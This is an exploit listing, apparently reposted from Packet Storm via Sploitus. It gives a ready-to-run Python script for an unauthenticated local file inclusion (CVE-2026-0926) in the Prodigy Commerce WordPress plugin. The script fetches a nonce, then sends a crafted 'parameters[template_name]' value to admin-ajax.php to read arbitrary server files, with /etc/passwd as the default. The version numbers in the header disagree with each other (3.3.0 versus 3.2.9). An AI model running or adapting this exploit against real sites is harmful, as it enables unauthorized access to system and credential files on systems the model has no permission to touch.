Share
## https://sploitus.com/exploit?id=PACKETSTORM:222213
# Exploit Title: Prodigy Commerce  3.3.0 - Local File Inclusion 
    # Date: 23-05-2026
    # Exploit Author: Diamorphine
    # Vendor Homepage: https://prodigycommerce.com/
    # Software Link: https://wordpress.org/plugins/prodigy-commerce/
    # Version: 3.2.9
    # Tested on: Debian
    # CVE : CVE-2026-0926
    # Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.
    
    
    import httpx
    import asyncio
    import re
    from urllib.parse import urljoin
    import argparse
    
    
    def get_nonce(base_url):
        with httpx.Client(verify=False) as client:
            r = client.get(url=base_url)
            match = re.search(r'var settings\s*=\s*{[^}]*"nonce":"([^"]+)"', r.text)
            if match:
                nonce = match.group(1)
                return nonce
            else:
                print("Nonce not found")
    
    async def main(base_url,file):
        async with httpx.AsyncClient(verify=False) as client:
            nonce = get_nonce(base_url)
            data = {
                "action": "prodigy-render-my-account-widget",
                "nonce": nonce,
                "parameters[template_name]": file,
                "parameters[default_path]": "/"
            }
    
            url = urljoin(base_url, '/wp-admin/admin-ajax.php')
            r = await client.post(url=url, data=data)
            raw = r.json()
            out = raw['data']
            print(out['html'])
    
    parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
    parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
    parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
    args = parser.parse_args()
    
    asyncio.run(main(args.url, args.file))